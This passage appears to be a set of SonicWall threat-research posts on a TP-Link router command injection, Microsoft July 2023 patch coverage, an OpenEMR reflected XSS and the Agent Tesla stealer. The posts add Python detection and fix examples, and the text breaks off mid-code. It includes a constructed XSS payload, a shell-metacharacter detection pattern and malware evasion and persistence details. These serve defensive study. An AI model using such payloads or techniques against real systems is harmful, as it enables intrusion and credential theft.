TP-Link Archer Command Injection Vulnerability

TP-Link is a company that specializes in manufacturing and selling networking products, including routers, switches, Wi-Fi range extenders, powerline adapters, access points, network adapters, and smart home devices. They provide reliable and affordable networking solutions for both home and business use.
The TP-Link Archer AX21 is a Wi-Fi 6 Dual-Band wireless router designed to deliver high-speed and reliable wireless connectivity for home networks.

TP-Link Archer AX21 Command Injection | CVE-2023-1389
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contain a command injection vulnerability in the web management interface.
The issue resides in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Due to inadequate sanitization of the country parameter in a write operation, an unauthenticated attacker could exploit the flaw using a simple POST request. By injecting malicious commands, the attacker could execute them as the root user, potentially gaining unauthorized access and control over the router.
The CVSS (Common Vulnerability Scoring System) score is 8.8 with CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack vector is Adjacent.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

As seen in the exploit above, the vulnerable country parameter is used to download malicious content from a URL with the wget command. The vertical bar (|) pipes the output of one command into another; here the output of wget is piped into sh, the shell, so the downloaded content is passed directly to the shell for execution. The attacker could run such commands as root and take over the router.
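The detection side of the description above, as an added example that is not SonicWall's signature or TP-Link's code: a Python triage routine that flags POST requests which write the country form with shell metacharacters in the country value. The request records are constructed; the query field form=country, the body field operation=write and the two-or-three-letter allow-list for legitimate country values are inferred assumptions, not taken from the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request records (method, request target, body); not taken from a real device log.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/luci/;stok=/locale?form=country", "operation=write&country=US"),
    ("POST", "/cgi-bin/luci/;stok=/locale?form=country", "operation=write&country=US%3Bid"),
    ("POST", "/cgi-bin/luci/;stok=/locale?form=country", "operation=read"),
    ("GET", "/cgi-bin/luci/;stok=/locale?form=lang", ""),
]

# The page gives the endpoint as /cgi-bin/luci;stok=/locale; an optional slash before
# ';stok=' is accepted so either spelling matches.
LOCALE_PATH = re.compile(r"^/cgi-bin/luci/?;stok=/locale$")
# Characters that let a value break out of a shell command line (command separators,
# pipes, background operator, backtick and $(...) substitution, line breaks).
SHELL_META = re.compile(r"[;|&`$\n\r]")
# Assumed allow-list for a legitimate country value: two or three ASCII letters, e.g. "US".
COUNTRY_OK = re.compile(r"^[A-Za-z]{2,3}$")


def is_country_write(method, target, body):
    """True when the request is a write to the country form of the locale endpoint."""
    if method.upper() != "POST":
        return False
    parts = urlsplit(target)
    if not LOCALE_PATH.match(parts.path):
        return False
    query = parse_qs(parts.query)
    form = parse_qs(body)
    return query.get("form") == ["country"] and form.get("operation") == ["write"]


def classify(method, target, body):
    """Return None for unrelated traffic, 'benign' or 'suspicious' for a country write."""
    if not is_country_write(method, target, body):
        return None
    values = parse_qs(body, keep_blank_values=True).get("country", [""])
    for value in values:
        # parse_qs has already URL-decoded the value, so %3B is inspected as ';'
        if SHELL_META.search(value) or not COUNTRY_OK.match(value):
            return "suspicious"
    return "benign"


def triage(records):
    """Map each record index to its verdict so a batch of log entries can be summarised."""
    return {i: classify(*rec) for i, rec in enumerate(records)}


if __name__ == "__main__":
    for i, verdict in triage(SAMPLE_REQUESTS).items():
        print(i, SAMPLE_REQUESTS[i][1], SAMPLE_REQUESTS[i][2], verdict)
```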

SonicWall Capture Labs provides protection against this threat via the following signature:

  • IPS 15864:TP-Link Archer AX21 Command Injection

TP-Link has released firmware version 1.1.4 Build 20230219 which fixes this vulnerability.

Microsoft Security Bulletin Coverage for July 2023

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-32046 Windows MSHTML Platform Elevation of Privilege Vulnerability
IPS 19225: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 1
IPS 19226: Windows MSHTML Platform Elevation of Privilege (CVE-2023-32046) 2

CVE-2023-33134 Microsoft SharePoint Server Remote Code Execution Vulnerability
IPS 3941: Microsoft SharePoint Server Remote Code Execution (CVE-2023-33134)

CVE-2023-33157 Microsoft SharePoint Remote Code Execution Vulnerability
IPS 3943: Microsoft SharePoint Remote Code Execution (CVE-2023-33157)

CVE-2023-35311 Microsoft Outlook Security Feature Bypass Vulnerability
ASPY 461: Exploit-exe exe.MP_330

CVE-2023-36874 Windows Error Reporting Service Elevation of Privilege Vulnerability
ASPY 462: Exploit-exe exe.MP_331

CVE-2023-36884 Office and Windows HTML Remote Code Execution Vulnerability
ASPY 463: Malformed-rtf rtf.MP_34

The following vulnerabilities do not have exploits in the wild:
CVE-2023-21526 Windows Netlogon Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21756 Windows Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-29347 Windows Admin Center Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32033 Microsoft Failover Cluster Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32034 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32035 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32037 Windows Layer-2 Bridge Network Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32038 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32039 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32040 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32041 Windows Update Orchestrator Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32042 OLE Automation Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32043 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32044 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32045 Microsoft Message Queuing Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32047 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32049 Windows SmartScreen Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-32050 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32051 Raw Image Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32052 Microsoft Power Apps Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-32053 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32054 Volume Shadow Copy Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32055 Active Template Library Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32056 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-32057 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-32083 Microsoft Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-32084 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-32085 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33127 .NET and Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33148 Microsoft Office Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33149 Microsoft Office Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33150 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33151 Microsoft Outlook Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33152 Microsoft ActiveX Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33153 Microsoft Outlook Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33154 Windows Partition Management Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33155 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33156 Microsoft Defender Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-33158 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33159 Microsoft SharePoint Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-33160 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33161 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33162 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-33163 Windows Network Load Balancing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-33164 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33165 Microsoft SharePoint Server Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33166 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33167 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33168 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33169 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33170 ASP.NET and Visual Studio Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-33171 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-33172 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33173 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-33174 Windows Cryptographic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35296 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35297 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35298 HTTP.sys Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35299 Windows Common Log File System Driver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35300 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35302 Microsoft PostScript and PCL6 Class Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35303 USB Audio Class System Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35304 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35305 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35306 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35308 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35309 Microsoft Message Queuing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35310 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35312 Microsoft VOLSNAP.SYS Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35313 Windows Online Certificate Status Protocol (OCSP) SnapIn Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35314 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35315 Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35316 Remote Procedure Call Runtime Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35317 Windows Server Update Service (WSUS) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35318 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35319 Remote Procedure Call Runtime Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35320 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35321 Windows Deployment Services Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35322 Windows Deployment Services Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35323 Windows OLE Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35324 Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35325 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35326 Windows CDP User Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35328 Windows Transaction Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35329 Windows Authentication Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35330 Windows Extended Negotiation Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35331 Windows Local Security Authority (LSA) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35332 Windows Remote Desktop Protocol Security Feature Bypass
There are no known exploits in the wild.
CVE-2023-35333 MediaWiki PandocUpload Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35335 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-35336 Windows MSHTML Platform Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35337 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35338 Windows Peer Name Resolution Protocol Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35339 Windows CryptoAPI Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-35340 Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35341 Microsoft DirectMusic Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-35342 Windows Image Acquisition Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35343 Windows Geolocation Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35344 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35345 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35346 Windows DNS Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35347 Microsoft Store Install Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35348 Active Directory Federation Service Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35350 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35351 Windows Active Directory Certificate Services (AD CS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35352 Windows Remote Desktop Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-35353 Connected User Experiences and Telemetry Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35356 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35357 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35358 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35360 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35361 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35362 Windows Clip Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35363 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35364 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-35365 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35366 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35367 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-35373 Mono Authenticode Validation Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-35374 Paint 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36867 Visual Studio Code GitHub Pull Requests and Issues Extension Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-36868 Azure Service Fabric on Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-36871 Azure Active Directory Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-36872 VP9 Video Extensions Information Disclosure Vulnerability
There are no known exploits in the wild.

OpenEMR Reflected XSS Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing the efficiency of medical practice management. Among the critical features it provides are patient statistics, medical billing, electronic medical record (EMR) generation, and appointment scheduling. The listed capabilities empower medical practitioners, clinics, and hospitals to effectively manage and coordinate patient schedules, maintain detailed patient records, and streamline the billing process electronically. OpenEMR is designed with a flexible, user-friendly interface, making it an accessible solution for healthcare providers aiming to digitize and optimize their administrative and patient care processes. As an open-source platform, it also affords the flexibility of customization according to individual or institutional needs, further enhancing its applicability across a broad range of healthcare settings.

  A reflected cross-site scripting vulnerability has been identified in OpenEMR. This vulnerability arises from inadequate input validation associated with the ‘list_id’ parameter in ‘share_template.php’.

  A remote attacker could exploit this vulnerability by enticing a victim to open a crafted URL. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim’s browser.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2948.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.6 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.6 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  The vulnerability stems from inadequate validation of the “list_id” parameter in the “share_template.php” file. When a request is submitted to the RequestURI at “library/custom_template/share_template.php”, it leads to the generation of HTML content by “share_template.php”. This content also encompasses some JavaScript code. Within the context of this generated JavaScript code, the value of the “list_id” parameter is manifested in the definition of a function called “add_template()”, as illustrated below:
  
  where $list_id is sanitized first by using PHP htmlspecialchars() function.

  However, the use of htmlspecialchars() for XSS sanitization is ineffective in this case, as it only escapes the characters “<”, “>”, and single and double quotes. An attacker can bypass this limitation by sending malicious JavaScript code that avoids these specific characters in the “list_id” request parameter and delivering the request to the “share_template.php” endpoint. With a specially tailored “list_id” value, the attacker can interfere with the original “add_template()” function definition and append their own JavaScript code immediately after it. For instance, consider a situation where the “list_id” parameter contains a crafted value like the one below:
  
  Then “share_template.php” will generate the following JavaScript inside the HTML response:
  
  In this scenario, the crafted value closes the original “add_template()” function definition early and inserts a script statement – “alert(55555)” – right after the function ends. Consequently, “alert(55555)” executes when the server-returned HTML content is loaded in the user’s browser. If “alert(55555)” were swapped for a different malicious script, that script would run in the victim’s browser, which is the cross-site scripting condition.
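Added illustration, not OpenEMR's code and written in Python rather than PHP: a stand-in for the generated add_template() script shows why HTML-context escaping (a Python equivalent of htmlspecialchars) does not stop a payload that avoids <, > and quotes, and what context-correct handling looks like (validate list_id as an integer, or JSON-encode a string destined for a JavaScript context). The template shape and the payload are assumptions, since the page does not reproduce the original script.

```python
import html
import json
import re

# Assumed shape of the generated script: the page says list_id appears inside the
# add_template() definition but does not reproduce the template, so this stand-in
# places the value in an unquoted slot (the double braces are literal braces for str.format).
TEMPLATE = "function add_template() {{\n  var list_id = {value};\n  return list_id;\n}}\n"

# Constructed payload shaped as the page describes: no < > " ' or &, so HTML escaping
# leaves it untouched; it closes the function body and appends a statement after it.
PAYLOAD = "1;}alert(55555);function x(){"


def php_htmlspecialchars(value):
    """Python stand-in for PHP htmlspecialchars(): escapes & < > and both quote characters."""
    return html.escape(value, quote=True)


def render_vulnerable(list_id):
    """HTML-context escaping only, as in the vulnerable share_template.php described above."""
    return TEMPLATE.format(value=php_htmlspecialchars(list_id))


def render_fixed(list_id):
    """Treat list_id as an identifier: reject anything that is not a decimal integer,
    then emit it through JSON encoding so the JavaScript context cannot be broken."""
    if not re.fullmatch(r"[0-9]{1,10}", list_id):
        raise ValueError("list_id must be a decimal integer")
    return TEMPLATE.format(value=json.dumps(int(list_id)))


def fixed_accepts(list_id):
    """True when render_fixed() accepts the value (convenience for checks and tests)."""
    try:
        render_fixed(list_id)
        return True
    except ValueError:
        return False


def js_string_literal(value):
    """Context-correct escaping for a free-form string that must land inside a <script>
    block: JSON-encode it, then hex-escape the characters that could close the tag or
    interfere with HTML parsing (the PHP equivalent is json_encode with the JSON_HEX_* flags)."""
    encoded = json.dumps(value)
    return (encoded.replace("<", "\\u003c").replace(">", "\\u003e")
                   .replace("&", "\\u0026").replace("/", "\\/"))


def appears_at_top_level(script, needle):
    """True when `needle` occurs outside every {...} block of `script`, meaning it would
    run as a top-level statement instead of staying inside the function body."""
    depth = 0
    for i, ch in enumerate(script):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
        elif depth == 0 and script.startswith(needle, i):
            return True
    return False


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print("alert escaped the function:", appears_at_top_level(render_vulnerable(PAYLOAD), "alert("))
    print("fixed renderer accepts payload:", fixed_accepts(PAYLOAD))
    print(js_string_literal("</script>"))
```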

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.
  • The attacker must be able to deliver a malicious URL to a target user.

Triggering Conditions:

  A user is lured by an attacker into opening a URL that contains a carefully designed list_id parameter. The vulnerability manifests itself when the user initiates the URL in a web browser.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 19216 OpenEMR Cross-Site Scripting

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released a patch to address this issue; see the vendor advisory.

Agent Tesla RAT Disguised As NSIS Installer

Overview

The SonicWall Capture Labs Research team recently observed an Agent Tesla sample that is loaded by a native loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed with the Microsoft .NET Framework and capable of stealing sensitive information. It has been one of the most prevalent malware families over the past couple of years.

In this blog post, we will discuss:

  • Capabilities of Agent Tesla with complete catalog of targeted software.
  • Understanding how Native Loader is used to load Agent Tesla.
  • Evolution of Agent Tesla’s String Decryption Algorithm.
  • Approach for Automatic String Decryption.

Introduction

Agent Tesla first appeared in 2014, has been active for over nine years, and is constantly updated by its threat actor with new capabilities. Its main objectives are credential stealing, keylogging, screen capture, clipboard capture, and stealing victims’ application data and sending it to the threat actor.

Infection Cycle

Agent Tesla is mainly delivered through phishing emails.

Fig 1. Infection Cycle

Unpacking of AgentTesla

The recent variant of Agent Tesla is distributed as an NSIS installer consisting of an NSIS script, a plugin DLL and an encrypted payload file.

Fig 2. Extracted Files of NSIS installer

Layer 1 – Plugin DLL

The NSIS plugin DLL calls its exported function “HvDeclY”, which decrypts the layer 2 shellcode.

Layer 2 – Shellcode

API HASHING

The shellcode uses API hashing to obfuscate its API calls.

Fig 3. Custom API Hashing Algorithm

ANTI-EMULATION

The shellcode crashes itself by jumping to an invalid address when dwNumberOfProcessors < 1 or when the VirtualAllocExNuma API is unable to allocate memory.

The shellcode has a further anti-emulation check: it allocates 381 MB of memory, sets each byte to 0 and then frees that memory again.

On 64-bit systems, the shellcode uses the Heaven’s Gate technique to hinder analysis in a debugger.

Fig 4. Heaven’s Gate call

PROCESS HOLLOWING

On 64-bit systems the shellcode invokes the APIs used for process hollowing directly through the syscall instruction; on 32-bit systems the same APIs are invoked through the sysenter instruction.

Fig 5. 64-bit Code, Syscall through Heaven’s Gate

This layer serves as the loader that begins execution of the native loader.

Native Loader

The layer 2 shellcode decrypts an encrypted native C++ loader and starts its execution. This Agent Tesla variant differs notably from previously examined variants: Agent Tesla is loaded via a native C++ loader instead of through multiple stages of .NET assembly modules.

The native loader stores the final Agent Tesla payload in its resource directory. The loader hosts the Common Language Runtime through the CLR hosting interfaces in order to load and run .NET assemblies; mscoree.dll implements the functions used for CLR hosting.

Fig 6. API call sequence to load a .NET managed assembly from unmanaged code.

The native loader injects the final Agent Tesla payload into a newly created process and starts its execution.

Technical Analysis of Agent Tesla

Capabilities of Agent Tesla

This recent version of Agent Tesla harvests a variety of sensitive data from a wide selection of browsers, VPN, FTP and email clients, and more. The sensitive data collected from an application includes its credentials, the “\user data” directory of the particular browser, cookies from browsers and FTP applications, and configuration data.

  • Data Harvesting 
    • Browsers: IE/Edge, UC Browser, Safari for Windows, QQ Browser, Falkon Browser, Flock Browser, Opera Browser, Yandex Browser, Iridium Browser, Chromium, 7 Star, Torch Browser, Cool Novo, Chrome Plus, Kometa, Amigo, Brave, Cent Browser, Chedot, Orbitum, Sputnik, Comodo Dragon, Vivaldi, Citrio, 360 Browser, Uran, Liebao Browser, Elements Browser, Epic Privacy, Cốc Cốc browser, Sleipnir 6, QIP Surf, Coowon, Google Chrome, Edge Chromium, Firefox, SeaMonkey, BlackHawk, CyberFox, K-Meleon, IceCat, Pale Moon, IceDragon, WaterFox, Postbox
    • Email clients: Eudora, The Bat, Becky, Outlook, Windows Mail App, FoxMail, Opera Mail, PocoMail, eM Client, Mailbird, Thunderbird, Claws, IncrediMail.
    • FTP/SCP clients: FileZilla, CoreFTP, WinSCP, Flash FXP, FTP Navigator, SmartFTP, WS_FTP, FtpCommander, FTPGetter.
    • Databases: Berkeley DB, MySQL Workbench.
    • VPN clients: NordVPN, OpenVPN, Private Internet Access VPN.
    • Virtual network computing clients: RealVNC, WinVNC3, TightVNC, UltraVNC.
    • Instant Messaging programs: Discord, Paltalk, Pidgin, Psi/Psi+, Trillian
    • Dynamic DNS clients: DynDns
    • Download Managers: JDownloader, Internet Downloader Manager
    • Windows Credentials: Windows Secure Note, Windows Web Password Credential, Windows Credential Picker Protector, Web Credentials, Windows Credentials, Windows Domain Certificate Credential, Windows Domain Password Credential, Windows Extended Credential
  • Keystrokes logging
  • Clipboard Scraping
  • Screenshot Capturing
  • Deleting Zone identifier
    • Agent Tesla deletes the Zone Identifier to remove the trace that the file originated from an untrusted source.

      Fig 7. Deleting the Zone Identifier

Fingerprinting

Agent Tesla uses the computer name, operating system, processor name, total memory, current date and time, IP address, internet connectivity, username, MAC address and serial number for fingerprinting.

Persistence

Agent Tesla achieves persistence by adding two autorun registry keys.

  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run

Exfiltration

Normally Agent Tesla exfiltrates collected data via FTP, HTTP, SMTP or a Telegram bot, but this variant only uses SMTP.

The malware uses a compromised email account to send the collected data to a mail server managed by the attacker.

The techniques discussed above are common to most .NET stealers. The SonicWall research team has explained them in full in the Unmasking .Net Stealer and Redline blog posts.

Configuration Data

Agent Tesla keeps its configuration data encoded.

Fig 8. Agent Tesla’s Decoded Configuration Data

Evolution of String decryption Algorithm

In this section we will discuss the evolution of string decryption algorithms of Agent Tesla.

Agent Tesla is actively changing its tactics to hide from security software. One of those tactics is string encryption, which is crucial for keeping strings hidden from security software and reverse engineers. All the important configuration data and IOCs, such as the browser name list, C2 host name and SMTP credentials, are stored in Agent Tesla as encrypted strings.

Version 1

In this version the encrypted strings are stored base64-encoded.

The decryption function “s_method_0” derives a key from a hardcoded password and salt using the SHA1 hashing algorithm. The base64-decoded string is then decrypted with AES in CBC mode using the generated key and a hardcoded IV.

Fig 9. AES Decryption Function(bottom), example of encrypted string(top)

Version 2

In this version Agent Tesla uses AES in CBC mode as in version 1, but with a different key and IV for each string. Strings are stored in an array of objects, where each object has three elements: the encrypted string, the key and the IV.


Fig 10. AES Decryption Function(bottom), example of encrypted string(top)

Version 3

In this version Agent Tesla implements simple XOR decryption. The XORed strings are stored in an array of bytes.

The decryption function is defined in the .cctor() constructor of the binary. When the malware starts executing, the constructor is called automatically and decrypts the encrypted string array using a hardcoded one-byte XOR key. To locate a specific string, the malware uses the array offset and the size of the string, as there is no separator between strings.

Fig 11. Simple XOR decryption (bottom), example of encrypted string (top)
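A Python model of the version 3 scheme just described, added here as an example rather than taken from a sample: one-byte XOR over a separator-free string array, strings resolved by (offset, size), plus a crib-based key search that goes beyond the page for the case where the key has not yet been located in .cctor(). The byte array, key and string table are constructed stand-ins, not real Agent Tesla data.

```python
# Constructed stand-in for an Agent Tesla version 3 string table: one-byte XOR key,
# strings concatenated without separators, each located by (offset, size).
XOR_KEY = 0x5A
_PLAINTEXT = b"chrome.exe" + b"smtp.example.invalid" + b"Login Data"
ENCRYPTED_ARRAY = bytes(b ^ XOR_KEY for b in _PLAINTEXT)
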